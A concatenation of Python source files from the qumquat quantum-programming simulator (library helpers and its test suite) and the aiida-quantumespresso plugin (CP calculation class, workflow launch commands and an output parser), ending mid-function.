def atan(self, expr):
if not isinstance(expr, Expression):
if not isinstance(expr, Key): return math.atan(float(expr))
expr = Expression(expr, qq=self)
newexpr = Expression(expr)
newexpr.c = lambda b: math.atan(float(expr.c(b)))
newexpr.float = True
return newexpr
def sqrt(self, expr):
if not isinstance(expr, Expression):
if not isinstance(expr, Key): return math.sqrt(float(expr))
expr = Expression(expr, qq=self)
newexpr = Expression(expr)
newexpr.c = lambda b: math.sqrt(float(expr.c(b)))
newexpr.float = True
return newexpr
def exp(self, expr):
if not isinstance(expr, Expression):
if not isinstance(expr, Key): return math.exp(float(expr))
expr = Expression(expr, qq=self)
newexpr = Expression(expr)
newexpr.c = lambda b: math.exp(float(expr.c(b)))
newexpr.float = True
return newexpr
######################### QRAM
def qram(self, dictionary, index):
if not isinstance(index, Expression): index = Expression(index, qq=self)
if index.float:
raise ValueError("QRAM keys must be integers, not floats.")
# cast dictionaries to lists
if isinstance(dictionary, list):
dictionary = {i:dictionary[i] for i in range(len(dictionary))}
casted_dict = {}
isFloat = False
for key in dictionary.keys():
expr = Expression(dictionary[key], qq=self)
if expr.float: isFloat = True
casted_dict[key] = expr
newexpr = Expression(index)
newexpr.c = lambda b: casted_dict[int(index.c(b))].c(b)
newexpr.float = isFloat
return newexpr
############ SWAP
def swap(self, key1, key2):
key1 -= key2 # a1 = a0-b0
key2 += key1 # b1 = b0+a1 = a0
key1 -= key2 # a2 = a1-b1 = -b0
key1 *= -1
--- FILE SEPARATOR ---
import qumquat as qq
from qumquat.qvars import es_int
import matplotlib.pyplot as plt
import math
def test_init():
print("init")
# ints and es_ints
x = qq.reg(1)
x.clean(es_int(1))
x = qq.reg(1)
x.clean(1)
# superpositions
x = qq.reg([1,es_int(2),3])
x.clean([1,2,es_int(3)])
# other variables
x = qq.reg(range(5))
y = qq.reg(x)
z = qq.reg(x // 2)
qq.print(x,y,z)
z.clean(y // 2)
x.clean(y)
y.clean(range(5))
def test_inv():
print("inv")
x,y = qq.reg(0,1)
def stuff(x):
x += 1
x -= (y+5)//2
x *= y
# x *= 0 causes IrrevError
x -= 2
x //= 1
# x //= 2 causes IrrevError
x ^= (y+1)
stuff(x)
qq.print(x)
with qq.inv(): stuff(x)
x.clean(0)
y.clean(1)
def test_if():
print("if")
x = qq.reg([0,1])
y = qq.reg(0)
with qq.q_if(x): y += 1
qq.print(x, y)
with qq.q_if(x == 0): y += 1
y.clean(1)
x.clean([0,1])
def test_quantum():
print("quantum")
#### simple quantum teleportation test
y = qq.reg([-1, 1])
with qq.q_if(y < 0): qq.phase_pi(1) # Z gate
# y[-1] now |->
# Bell state
x = qq.reg(0)
x.had(0)
x.cnot(0,1)
# cnot across registers
with qq.q_if(y[-1]): x ^= 1
# measure
x_meas = int(qq.measure(x[0]))
y.had(-1)
y_meas = int(qq.measure(y[-1]))
# apply x correction and z correction
if x_meas: x ^= 2
with qq.q_if(y_meas & x[1]): qq.phase_pi(1)
# x[1] is now |->
x.had(1)
x.clean(x_meas + 2)
#### gentle measurement test
x = qq.reg([-5,5,-2,2])
out = qq.measure(x**2)
qq.print(x)
def test_inv_if():
print("inv if")
x, y = qq.reg([0,1], 0)
with qq.inv():
with qq.q_if(x):
y += 1
with qq.q_if(y):
with qq.inv():
x += 1
qq.print(x,y)
x.clean(0)
y.clean([0,-1])
def test_while():
print("while")
x, y, l = qq.reg(1, [10,15,16], 0)
with qq.q_while(x < y, l): x += 2
qq.print(x,y,l)
with qq.inv():
with qq.q_while(x < y, l): x += 2
x.clean(1)
y.clean([10,15,16])
l.clean(0)
def test_collatz():
print("collatz")
# collatz test
x, l = qq.reg(range(1,11), 0)
y = qq.reg(x)
# nested while
with qq.q_while(x > 1, l):
tmp = qq.reg(x % 2)
with qq.q_if(tmp == 0):
x //= 2
with qq.q_if(tmp == 1):
x *= 3
x += 1
qq.print(y,l)
def test_order():
print("order")
n = 5
x = qq.reg(range(2**n))
qq.reg((7**x).int() % 15) # has period 4
with qq.inv(): x.qft(2**n)
vals, probs, _ = qq.distribution(x)
plt.plot(vals,probs)
plt.show()
def test_garbage_1():
print("garbage 1")
with qq.garbage():
x = qq.reg(1)
y = qq.reg(2)
x += 1
with qq.inv():
xp = qq.reg(1)
yp = qq.reg(2)
xp += 1
def test_garbage_2():
print("garbage 2")
@qq.garbage("test")
def messy(x):
out = qq.reg(x)
for i in [100, 200, 300]:
with qq.q_while(x*out < i, qq.reg(0)):
out += 1
return out
x = qq.reg([2,4,7,8])
out = qq.reg(messy(x))
with qq.inv(): messy(x)
qq.print(x,out,x*out)
def test_garbage_3():
print("garbage 3")
a = qq.reg(1)
with qq.garbage("test"):
x = qq.reg(1)
x += a
with qq.garbage("test"):
y = qq.reg(2)
z = qq.reg(3)
y += 3
with qq.garbage("test-2"):
y = qq.reg(8)
y += 2
with qq.garbage("test"):
with qq.inv(): qq.reg(2)
z.clean(3)
with qq.garbage("test"):
with qq.inv(): qq.reg(5)
with qq.garbage("test-2"):
with qq.inv(): qq.reg(10)
def test_garbage_4():
print("garbage 4")
x = qq.reg(5)
with qq.garbage():
x.assign(3)
qq.print("assign(3) yields", x)
with qq.inv(): x.assign(3)
with qq.garbage():
qq.print("before bitset",*[x[i] for i in range(-1,3)])
x[-1] = 1
x[1] = 1
qq.print("bitset yields",*[x[i] for i in range(-1,3)])
with qq.inv():
x[-1] = 1
x[1] = 1
def test_garbage_5():
print("garbage 5")
i = qq.reg(0)
tmp = qq.reg(0)
with qq.garbage():
with qq.q_while(i < 4, tmp):
x = qq.reg(i)
i += 1
with qq.inv():
with qq.q_while(i < 4, tmp):
x = qq.reg(i)
i += 1
i.clean(0)
tmp.clean(0)
# grover's search on max clique
def grover():
print("grover")
n = 8
# generate a random graph
import random
k = 4
edges = []
for i in range(n):
for j in range(i+1,n):
if i != j+1 % n:
edges.append([i,j])
# if random.random() > 0.5:
@qq.garbage("oracle")
def oracle(x):
num_bad = qq.reg(0)
clique_size = qq.reg(0)
for i in range(n):
with qq.q_if(x[i]): clique_size += 1
for j in range(i+1,n):
if [i,j] not in edges:
with qq.q_if(x[i] & x[j]): num_bad += 1
return (num_bad == 0) & (clique_size >= k)
x = qq.reg(range(2**n))
for i in range(1):
with qq.q_if(oracle(x)): qq.phase_pi(1)
with qq.inv(): oracle(x)
for j in range(n): x.had(j)
with qq.q_if(x == 0): qq.phase_pi(1)
for j in range(n): x.had(j)
values, probs, _ = qq.distribution(x)
plt.bar(values, probs)
plt.show()
def test_repeated_square():
print("repeated square")
@qq.garbage("repsquare")
def rep_square(b, x, N):
out = qq.reg(0)
tmp = qq.reg(b)
for i in range(5):
with qq.q_if(x[i]): out += tmp
tmp **= 2
tmp %= N
return out % 13
x = qq.reg(range(16))
out = qq.reg(0)
with qq.garbage():
out += rep_square(7, x, 13)
with qq.inv(): rep_square(7, x, 13)
qq.assert_pile_clean('repsquare')
qq.print(x,out, 7**x % 13)
def test_for():
print("for")
class q_for():
def __init__(self, i, maxval):
self.i = i
self.maxval = maxval
self.tmp = qq.reg(0) # temporary register
# compute the number of iterations
self.num_iter = qq.reg(0)
with qq.q_if(i < maxval):
self.num_iter += maxval - i
self.q_while = qq.q_while(i < maxval, self.tmp)
def __enter__(self):
self.q_while.__enter__()
def __exit__(self, *args):
self.i += 1
self.q_while.__exit__()
# clean the temporary register
self.tmp.clean(self.num_iter)
# return i to previous value
self.i -= self.num_iter
# uncompute the number of iterations
with qq.q_if(self.i < self.maxval):
self.num_iter -= self.maxval - self.i
self.num_iter.clean(0)
x = qq.reg([2,3,4,5])
out = qq.reg(0)
i = qq.reg(3)
with q_for(i, x):
out += i**2
i.clean(3)
qq.print(x,out)
def test_qft():
print("qft")
for i in range(-10,10,3):
qq.clear()
print(i)
x = qq.reg(i)
x.qft(4)
qq.print(x)
def test_postselect():
print("postselect")
x = qq.reg(range(42))
print("postselection success:", qq.postselect(x**3 % 5 == 1))
qq.print(x)
qq.clear()
def test_qram():
print("qram")
d1 = {0: 3, 1: 4, 2: 3}
d2 = [6,5,2,6,1]
x = qq.reg([0,1,2])
qq.print(x, qq.qram(d1,x), qq.qram(d2,x))
def test_rotY():
print("rotY")
y = qq.reg(0)
qq.utils.rotY(y, 0, 2*math.pi*30/360)
qq.print_amp(y)
return
ps = []
n = 91 # should be odd
for i in range(n):
y = qq.reg(0)
qq.utils.rotY(y, 0, 2*math.pi*i/n)
qq.print_amp(360*i/n, y)
ps.append(qq.postselect(y == 0))
y.clean(0)
plt.bar(range(n), ps)
plt.plot(range(n), [math.cos(2*math.pi*i/n)**2 for i in range(n)])
plt.show()
def test_mul_amp():
print("mul_amp")
d2 = {0: 0.123, 1:0.567}
n = 2
x = qq.reg(range(2))
y = qq.reg(0)
qq.utils.rotY(y, 0, (x.qram(d2)).acos())
qq.print_amp(x, y)
for i in range(2):
print(i, d2[i]/math.sqrt(2))
prob = qq.postselect(y == 0)
print("ps", prob)
qq.print_amp(x, y)
for i in range(2):
print(i, (1/math.sqrt(prob))*d2[i]/math.sqrt(2))
def test_condinit():
print("conditional init")
z = qq.reg([5,6])
# conditional initialization?
x = qq.reg([0,1])
with qq.q_if(x): y = qq.reg([2,3])
qq.print_amp(x,y)
with qq.q_if(x): y.clean([2,3])
x.clean([0,1])
def test_stateprep():
print("state prep")
z = qq.reg([5,6])
v = {0: 0.5, 1: 0.3}
x = qq.reg([0,1])
with qq.q_if(x): y = qq.reg(v)
qq.print_amp(x,y)
with qq.q_if(x): y.clean(v)
x.clean([0,1])
if True:
test_init()
test_inv()
test_if()
test_quantum()
test_inv_if()
test_while()
test_collatz()
# test_order() # has plot
test_garbage_1()
test_garbage_2()
test_garbage_3()
test_garbage_4()
test_garbage_5()
# grover() # has plot
test_repeated_square()
test_for()
test_qft()
test_postselect()
test_qram()
test_condinit()
test_stateprep()
|
[
"/qumquat/__init__.py",
"/qumquat/control.py",
"/qumquat/garbage.py",
"/qumquat/init.py",
"/qumquat/keys.py",
"/qumquat/main.py",
"/qumquat/measure.py",
"/qumquat/primitive.py",
"/qumquat/qvars.py",
"/qumquat/snapshots.py",
"/qumquat/utils.py",
"/tests.py"
] |
00mjk/aiida-quantumespresso
|
# -*- coding: utf-8 -*-
"""Plugin to create a Quantum Espresso pw.x file.
TODO: COPY OUTDIR FROM PREVIOUS CALCULATION! Should be an input node of type
RemoteData (or maybe subclass it?).
TODO: tests!
TODO: DOC + implementation of SETTINGS
TODO: preexec, postexec
TODO: Check that no further parameters are passed in SETTINGS
TODO: many cards missing: check and implement
e.g.: ['CONSTRAINTS', 'OCCUPATIONS']
TODO: implement pre_... and post_... hooks to add arbitrary strings before
and after a namelist, and a 'final_string' (all optional); useful
for development when new cards are needed
TODO: all a lot of logger.debug stuff
"""
import os
from aiida import orm
from aiida.common.lang import classproperty
from aiida_quantumespresso.calculations import BasePwCpInputGenerator
class CpCalculation(BasePwCpInputGenerator):
"""`CalcJob` implementation for the cp.x code of Quantum ESPRESSO."""
# Constants to use in the calculation
_CP_READ_UNIT_NUMBER = 50
_CP_WRITE_UNIT_NUMBER = 51
_FILE_XML_PRINT_COUNTER_BASENAME = 'print_counter.xml'
_FILE_XML_PRINT_COUNTER = os.path.join(
BasePwCpInputGenerator._OUTPUT_SUBFOLDER,
'{}_{}.save'.format(BasePwCpInputGenerator._PREFIX, _CP_WRITE_UNIT_NUMBER),
_FILE_XML_PRINT_COUNTER_BASENAME,
)
# Input file "sections" that we are going to write by calculation type
# The term namelist is part of FORTRAN's jargon
_automatic_namelists = {
'scf': ['CONTROL', 'SYSTEM', 'ELECTRONS'],
'nscf': ['CONTROL', 'SYSTEM', 'ELECTRONS'],
'relax': ['CONTROL', 'SYSTEM', 'ELECTRONS', 'IONS'],
'cp': ['CONTROL', 'SYSTEM', 'ELECTRONS', 'IONS'],
'vc-cp': ['CONTROL', 'SYSTEM', 'ELECTRONS', 'IONS', 'CELL'],
'vc-relax': ['CONTROL', 'SYSTEM', 'ELECTRONS', 'IONS', 'CELL'],
'vc-wf': ['CONTROL', 'SYSTEM', 'ELECTRONS', 'WANNIER'],
}
# Pieces of input that we won't allow users to set
_blocked_keywords = [
('CONTROL', 'pseudo_dir'), # set later
('CONTROL', 'outdir'), # set later
('CONTROL', 'prefix'), # set later
('SYSTEM', 'celldm'),
('SYSTEM', 'nat'), # set later
('SYSTEM', 'ntyp'), # set later
('SYSTEM', 'a'),
('SYSTEM', 'b'),
('SYSTEM', 'c'),
('SYSTEM', 'cosab'),
('SYSTEM', 'cosac'),
('SYSTEM', 'cosbc'),
('CONTROL', 'ndr', _CP_READ_UNIT_NUMBER),
('CONTROL', 'ndw', _CP_WRITE_UNIT_NUMBER),
]
# In cp calculations we won't use kpoints data
_use_kpoints = False
# Use low verbosity for cp calculations
_default_verbosity = 'low'
_cp_ext_list = [
'cel',
'con',
'eig',
'evp',
'for',
'nos',
'pol',
'pos',
'spr',
'str',
'the',
'vel',
'wfc',
]
_internal_retrieve_list = [
os.path.join(
BasePwCpInputGenerator._OUTPUT_SUBFOLDER,
'{}.{}'.format(BasePwCpInputGenerator._PREFIX, ext),
) for ext in _cp_ext_list
] + [_FILE_XML_PRINT_COUNTER]
# in restarts, it will copy from the parent the following
_restart_copy_from = os.path.join(
BasePwCpInputGenerator._OUTPUT_SUBFOLDER,
'{}_{}.save'.format(BasePwCpInputGenerator._PREFIX, _CP_WRITE_UNIT_NUMBER),
)
# in restarts, it will copy the previous folder in the following one
_restart_copy_to = os.path.join(
BasePwCpInputGenerator._OUTPUT_SUBFOLDER,
'{}_{}.save'.format(BasePwCpInputGenerator._PREFIX, _CP_READ_UNIT_NUMBER),
)
@classproperty
def xml_filepaths(cls):
"""Return a list of relative filepaths of XML files."""
# pylint: disable=no-self-argument,not-an-iterable
filepaths = []
for filename in cls.xml_filenames:
filepath = os.path.join(
cls._OUTPUT_SUBFOLDER,
'{}_{}.save'.format(cls._PREFIX, cls._CP_WRITE_UNIT_NUMBER),
filename,
)
filepaths.append(filepath)
return filepaths
@classmethod
def define(cls, spec):
"""Define the process specification."""
# yapf: disable
super().define(spec)
spec.input('metadata.options.parser_name', valid_type=str, default='quantumespresso.cp')
spec.output('output_trajectory', valid_type=orm.TrajectoryData)
spec.output('output_parameters', valid_type=orm.Dict)
spec.default_output_node = 'output_parameters'
spec.exit_code(300, 'ERROR_NO_RETRIEVED_FOLDER',
message='The retrieved folder data node could not be accessed.')
spec.exit_code(301, 'ERROR_NO_RETRIEVED_TEMPORARY_FOLDER',
message='The retrieved temporary folder could not be accessed.')
spec.exit_code(303, 'ERROR_MISSING_XML_FILE',
message='The required XML file is not present in the retrieved folder.')
spec.exit_code(304, 'ERROR_OUTPUT_XML_MULTIPLE',
message='The retrieved folder contains multiple XML files.')
spec.exit_code(310, 'ERROR_OUTPUT_STDOUT_READ',
message='The stdout output file could not be read.')
spec.exit_code(311, 'ERROR_OUTPUT_STDOUT_PARSE',
message='The output file contains invalid output.')
spec.exit_code(312, 'ERROR_OUTPUT_STDOUT_INCOMPLETE',
message='The stdout output file was incomplete probably because the calculation got interrupted.')
spec.exit_code(320, 'ERROR_OUTPUT_XML_READ',
message='The required XML file could not be read.')
spec.exit_code(330, 'ERROR_READING_POS_FILE',
message='The required POS file could not be read.')
spec.exit_code(340, 'ERROR_READING_TRAJECTORY_DATA',
message='The required trajectory data could not be read.')
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""Command line scripts to launch a `PwBandsWorkChain` for testing and demonstration purposes."""
import click
from aiida.cmdline.params import options as options_cli
from aiida.cmdline.params import types
from aiida.cmdline.utils import decorators
from ...utils import launch
from ...utils import options as options_qe
from ...utils import validate
from .. import cmd_launch
@cmd_launch.command('pw-bands')
@options_cli.CODE(required=True, type=types.CodeParamType(entry_point='quantumespresso.pw'))
@options_qe.STRUCTURE(required=True)
@options_qe.PSEUDO_FAMILY(required=True)
@options_qe.KPOINTS_DISTANCE()
@options_qe.ECUTWFC()
@options_qe.ECUTRHO()
@options_qe.HUBBARD_U()
@options_qe.HUBBARD_V()
@options_qe.HUBBARD_FILE()
@options_qe.STARTING_MAGNETIZATION()
@options_qe.SMEARING()
@options_qe.AUTOMATIC_PARALLELIZATION()
@options_qe.CLEAN_WORKDIR()
@options_qe.MAX_NUM_MACHINES()
@options_qe.MAX_WALLCLOCK_SECONDS()
@options_qe.WITH_MPI()
@options_qe.DAEMON()
@decorators.with_dbenv()
def launch_workflow(
code, structure, pseudo_family, kpoints_distance, ecutwfc, ecutrho, hubbard_u, hubbard_v, hubbard_file_pk,
starting_magnetization, smearing, automatic_parallelization, clean_workdir, max_num_machines, max_wallclock_seconds,
with_mpi, daemon
):
"""Run a `PwBandsWorkChain`."""
# pylint: disable=too-many-statements
from aiida.orm import Bool, Float, Str, Dict
from aiida.plugins import WorkflowFactory
from aiida_quantumespresso.utils.resources import get_default_options, get_automatic_parallelization_options
builder = WorkflowFactory('quantumespresso.pw.bands').get_builder()
parameters = {
'SYSTEM': {
'ecutwfc': ecutwfc,
'ecutrho': ecutrho,
},
}
try:
hubbard_file = validate.validate_hubbard_parameters(
structure, parameters, hubbard_u, hubbard_v, hubbard_file_pk
)
except ValueError as exception:
raise click.BadParameter(str(exception))
try:
validate.validate_starting_magnetization(structure, parameters, starting_magnetization)
except ValueError as exception:
raise click.BadParameter(str(exception))
try:
validate.validate_smearing(parameters, smearing)
except ValueError as exception:
raise click.BadParameter(str(exception))
pseudo_family = Str(pseudo_family)
parameters = Dict(dict=parameters)
builder.structure = structure
builder.relax.base.pw.code = code
builder.relax.base.pw.parameters = parameters
builder.relax.base.pseudo_family = pseudo_family
builder.relax.base.kpoints_distance = Float(kpoints_distance)
builder.relax.meta_convergence = Bool(False)
builder.scf.pw.code = code
builder.scf.pw.parameters = parameters
builder.scf.pseudo_family = pseudo_family
builder.scf.kpoints_distance = Float(kpoints_distance)
builder.bands.pw.code = code
builder.bands.pw.parameters = parameters
builder.bands.pseudo_family = pseudo_family
if hubbard_file:
builder.relax.base.pw.hubbard_file = hubbard_file
builder.scf.base.pw.hubbard_file = hubbard_file
builder.bands.base.pw.hubbard_file = hubbard_file
if automatic_parallelization:
auto_para = Dict(dict=get_automatic_parallelization_options(max_num_machines, max_wallclock_seconds))
builder.relax.base.automatic_parallelization = auto_para
builder.scf.automatic_parallelization = auto_para
builder.bands.automatic_parallelization = auto_para
else:
options = get_default_options(max_num_machines, max_wallclock_seconds, with_mpi)
builder.relax.base.pw.metadata.options = options
builder.scf.pw.metadata.options = options
builder.bands.pw.metadata.options = options
if clean_workdir:
builder.clean_workdir = Bool(True)
launch.launch_process(builder, daemon)
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""Command line scripts to launch a `PwRelaxWorkChain` for testing and demonstration purposes."""
import click
from aiida.cmdline.params import options, types
from aiida.cmdline.utils import decorators
from ...utils import launch
from ...utils import options as options_qe
from ...utils import validate
from .. import cmd_launch
@cmd_launch.command('pw-relax')
@options.CODE(required=True, type=types.CodeParamType(entry_point='quantumespresso.pw'))
@options_qe.STRUCTURE(required=True)
@options_qe.PSEUDO_FAMILY(required=True)
@options_qe.KPOINTS_DISTANCE()
@options_qe.ECUTWFC()
@options_qe.ECUTRHO()
@options_qe.HUBBARD_U()
@options_qe.HUBBARD_V()
@options_qe.HUBBARD_FILE()
@options_qe.STARTING_MAGNETIZATION()
@options_qe.SMEARING()
@options_qe.AUTOMATIC_PARALLELIZATION()
@options_qe.CLEAN_WORKDIR()
@options_qe.MAX_NUM_MACHINES()
@options_qe.MAX_WALLCLOCK_SECONDS()
@options_qe.WITH_MPI()
@options_qe.DAEMON()
@click.option(
'-f',
'--final-scf',
is_flag=True,
default=False,
show_default=True,
help='Run a final scf calculation for the final relaxed structure.'
)
@decorators.with_dbenv()
def launch_workflow(
code, structure, pseudo_family, kpoints_distance, ecutwfc, ecutrho, hubbard_u, hubbard_v, hubbard_file_pk,
starting_magnetization, smearing, automatic_parallelization, clean_workdir, max_num_machines, max_wallclock_seconds,
with_mpi, daemon, final_scf
):
"""Run a `PwRelaxWorkChain`."""
from aiida.orm import Bool, Float, Str, Dict
from aiida.plugins import WorkflowFactory
from aiida_quantumespresso.utils.resources import get_default_options, get_automatic_parallelization_options
builder = WorkflowFactory('quantumespresso.pw.relax').get_builder()
parameters = {
'SYSTEM': {
'ecutwfc': ecutwfc,
'ecutrho': ecutrho,
},
}
try:
hubbard_file = validate.validate_hubbard_parameters(
structure, parameters, hubbard_u, hubbard_v, hubbard_file_pk
)
except ValueError as exception:
raise click.BadParameter(str(exception))
try:
validate.validate_starting_magnetization(structure, parameters, starting_magnetization)
except ValueError as exception:
raise click.BadParameter(str(exception))
try:
validate.validate_smearing(parameters, smearing)
except ValueError as exception:
raise click.BadParameter(str(exception))
builder.structure = structure
builder.base.pseudo_family = Str(pseudo_family)
builder.base.kpoints_distance = Float(kpoints_distance)
builder.base.pw.code = code
builder.base.pw.parameters = Dict(dict=parameters)
if hubbard_file:
builder.base.pw.hubbard_file = hubbard_file
if automatic_parallelization:
automatic_parallelization = get_automatic_parallelization_options(max_num_machines, max_wallclock_seconds)
builder.base.automatic_parallelization = Dict(dict=automatic_parallelization)
else:
builder.base.pw.metadata.options = get_default_options(max_num_machines, max_wallclock_seconds, with_mpi)
if clean_workdir:
builder.clean_workdir = Bool(True)
if final_scf:
builder.final_scf = Bool(True)
launch.launch_process(builder, daemon)
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
from aiida.common import OutputParsingError
class QEOutputParsingError(OutputParsingError):
"""Exception raised when there is a parsing error in the QE parser."""
pass
def get_parser_info(parser_info_template=None):
"""Return a template dictionary with details about the parser such as the version.
:param parser_info_template: template string with single placeholder to be replaced by current version number
:returns: dictionary with parser name, version and empty list for warnings
"""
import aiida_quantumespresso
parser_version = aiida_quantumespresso.__version__
parser_info = {}
parser_info['parser_warnings'] = []
parser_info['parser_version'] = parser_version
if parser_info_template is None:
parser_info['parser_info'] = 'aiida-quantumespresso parser v{}'.format(parser_version)
else:
parser_info['parser_info'] = parser_info_template.format(parser_version)
return parser_info
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
from distutils.version import LooseVersion
import numpy
from aiida.common import NotExistent
from aiida.orm import Dict, TrajectoryData
from qe_tools import CONSTANTS
from aiida_quantumespresso.parsers.parse_raw.cp import parse_cp_raw_output, parse_cp_traj_stanzas
from .base import Parser
class CpParser(Parser):
"""This class is the implementation of the Parser class for Cp."""
def parse(self, **kwargs):
"""Receives in input a dictionary of retrieved nodes.
Does all the logic here.
"""
try:
out_folder = self.retrieved
except NotExistent:
return self.exit(self.exit_codes.ERROR_NO_RETRIEVED_FOLDER)
# check what is inside the folder
list_of_files = out_folder._repository.list_object_names()
# options.metadata become attributes like this:
stdout_filename = self.node.get_attribute('output_filename')
# at least the stdout should exist
if stdout_filename not in list_of_files:
return self.exit(self.exit_codes.ERROR_OUTPUT_STDOUT_READ)
# This should match 1 file
xml_files = [xml_file for xml_file in self.node.process_class.xml_filenames if xml_file in list_of_files]
if not xml_files:
return self.exit(self.exit_codes.ERROR_MISSING_XML_FILE)
elif len(xml_files) > 1:
return self.exit(self.exit_codes.ERROR_OUTPUT_XML_MULTIPLE)
if self.node.process_class._FILE_XML_PRINT_COUNTER_BASENAME not in list_of_files:
self.logger.error('We could not find the print counter file in the output')
# TODO: Add an error for this counter
return self.exit(self.exit_codes.ERROR_MISSING_XML_FILE)
output_stdout = out_folder.get_object_content(stdout_filename)
output_xml = out_folder.get_object_content(xml_files[0])
output_xml_counter = out_folder.get_object_content(self.node.process_class._FILE_XML_PRINT_COUNTER_BASENAME)
out_dict, _raw_successful = parse_cp_raw_output(output_stdout, output_xml, output_xml_counter)
# parse the trajectory. Units in Angstrom, picoseconds and eV.
# append everthing in the temporary dictionary raw_trajectory
raw_trajectory = {}
evp_keys = [
'electronic_kinetic_energy', 'cell_temperature', 'ionic_temperature', 'scf_total_energy', 'enthalpy',
'enthalpy_plus_kinetic', 'energy_constant_motion', 'volume', 'pressure'
]
# Now prepare the reordering, as filex in the xml are ordered
reordering = self._generate_sites_ordering(out_dict['species'], out_dict['atoms'])
pos_filename = '{}.{}'.format(self.node.process_class._PREFIX, 'pos')
if pos_filename not in list_of_files:
return self.exit(self.exit_codes.ERROR_READING_POS_FILE)
trajectories = [
('positions', 'pos', CONSTANTS.bohr_to_ang, out_dict['number_of_atoms']),
('cells', 'cel', CONSTANTS.bohr_to_ang, 3),
(
'velocities', 'vel', CONSTANTS.bohr_to_ang / CONSTANTS.timeau_to_sec * 10**12,
out_dict['number_of_atoms']
),
]
for name, extension, scale, elements in trajectories:
try:
with out_folder.open('{}.{}'.format(self.node.process_class._PREFIX, extension)) as datafile:
data = [l.split() for l in datafile]
# POSITIONS stored in angstrom
traj_data = parse_cp_traj_stanzas(
num_elements=elements, splitlines=data, prepend_name='{}_traj'.format(name), rescale=scale
)
# here initialize the dictionary. If the parsing of positions fails, though, I don't have anything
# out of the CP dynamics. Therefore, the calculation status is set to FAILED.
if extension != 'cel':
raw_trajectory['{}_ordered'.format(name)
] = self._get_reordered_array(traj_data['{}_traj_data'.format(name)], reordering)
else:
raw_trajectory['cells'] = numpy.array(traj_data['cells_traj_data'])
if extension == 'pos':
raw_trajectory['times'] = numpy.array(traj_data['{}_traj_times'.format(name)])
except IOError:
out_dict['warnings'].append('Unable to open the {} file... skipping.'.format(extension.upper()))
# =============== EVP trajectory ============================
try:
with out_folder.open('{}.evp'.format(self._node.process_class._PREFIX)) as handle:
matrix = numpy.genfromtxt(handle)
# there might be a different format if the matrix has one row only
try:
matrix.shape[1]
except IndexError:
matrix = numpy.array(numpy.matrix(matrix))
if LooseVersion(out_dict['creator_version']) > LooseVersion('5.1'):
# Between version 5.1 and 5.1.1, someone decided to change
# the .evp output format, without any way to know that this
# happened... SVN commit 11158.
# I here use the version number to parse, plus some
# heuristics to check that I'm doing the right thing
#print "New version"
raw_trajectory['steps'] = numpy.array(matrix[:, 0], dtype=int)
raw_trajectory['evp_times'] = matrix[:, 1] # TPS, ps
raw_trajectory['electronic_kinetic_energy'] = matrix[:, 2] * CONSTANTS.hartree_to_ev # EKINC, eV
raw_trajectory['cell_temperature'] = matrix[:, 3] # TEMPH, K
raw_trajectory['ionic_temperature'] = matrix[:, 4] # TEMPP, K
raw_trajectory['scf_total_energy'] = matrix[:, 5] * CONSTANTS.hartree_to_ev # ETOT, eV
raw_trajectory['enthalpy'] = matrix[:, 6] * CONSTANTS.hartree_to_ev # ENTHAL, eV
raw_trajectory['enthalpy_plus_kinetic'] = matrix[:, 7] * CONSTANTS.hartree_to_ev # ECONS, eV
raw_trajectory['energy_constant_motion'] = matrix[:, 8] * CONSTANTS.hartree_to_ev # ECONT, eV
raw_trajectory['volume'] = matrix[:, 9] * (CONSTANTS.bohr_to_ang**3) # volume, angstrom^3
raw_trajectory['pressure'] = matrix[:, 10] # out_press, GPa
else:
#print "Old version"
raw_trajectory['steps'] = numpy.array(matrix[:, 0], dtype=int)
raw_trajectory['electronic_kinetic_energy'] = matrix[:, 1] * CONSTANTS.hartree_to_ev # EKINC, eV
raw_trajectory['cell_temperature'] = matrix[:, 2] # TEMPH, K
raw_trajectory['ionic_temperature'] = matrix[:, 3] # TEMPP, K
raw_trajectory['scf_total_energy'] = matrix[:, 4] * CONSTANTS.hartree_to_ev # ETOT, eV
raw_trajectory['enthalpy'] = matrix[:, 5] * CONSTANTS.hartree_to_ev # ENTHAL, eV
raw_trajectory['enthalpy_plus_kinetic'] = matrix[:, 6] * CONSTANTS.hartree_to_ev # ECONS, eV
raw_trajectory['energy_constant_motion'] = matrix[:, 7] * CONSTANTS.hartree_to_ev # ECONT, eV
raw_trajectory['volume'] = matrix[:, 8] * (CONSTANTS.bohr_to_ang**3) # volume, angstrom^3
raw_trajectory['pressure'] = matrix[:, 9] # out_press, GPa
raw_trajectory['evp_times'] = matrix[:, 10] # TPS, ps
# Huristics to understand if it's correct.
# A better heuristics could also try to fix possible issues
# (in new versions of QE, it's possible to recompile it with
# the __OLD_FORMAT flag to get back the old version format...)
# but I won't do it, as there may be also other columns swapped.
# Better to stop and ask the user to check what's going on.
max_time_difference = abs(numpy.array(raw_trajectory['times']) -
numpy.array(raw_trajectory['evp_times'])).max()
if max_time_difference > 1.e-4: # It is typically ~1.e-7 due to roundoff errors
# If there is a large discrepancy
# it means there is something very weird going on...
return self.exit(self.exit_codes.ERROR_READING_TRAJECTORY_DATA)
# Delete evp_times in any case, it's a duplicate of 'times'
del raw_trajectory['evp_times']
except IOError:
out_dict['warnings'].append('Unable to open the EVP file... skipping.')
# get the symbols from the input
# TODO: I should have kinds in TrajectoryData
input_structure = self.node.inputs.structure
raw_trajectory['symbols'] = [str(i.kind_name) for i in input_structure.sites]
traj = TrajectoryData()
traj.set_trajectory(
stepids=raw_trajectory['steps'],
cells=raw_trajectory['cells'],
symbols=raw_trajectory['symbols'],
positions=raw_trajectory['positions_ordered'],
times=raw_trajectory['times'],
velocities=raw_trajectory['velocities_ordered'],
)
for this_name in evp_keys:
try:
traj.set_array(this_name, raw_trajectory[this_name])
except KeyError:
# Some columns may have not been parsed, skip
pass
self.out('output_trajectory', traj)
# Remove big dictionaries that would be redundant
# For atoms and cell, there is a small possibility that nothing is parsed
# but then probably nothing moved.
try:
del out_dict['atoms']
except KeyError:
pass
try:
del out_dict['cell']
except KeyError:
pass
try:
del out_dict['ions_positions_stau']
except KeyError:
pass
try:
del out_dict['ions_positions_svel']
except KeyError:
pass
try:
del out_dict['ions_positions_taui']
except KeyError:
pass
# This should not be needed
try:
del out_dict['atoms_index_list']
except KeyError:
pass
# This should be already in the input
try:
del out_dict['atoms_if_pos_list']
except KeyError:
pass
#
try:
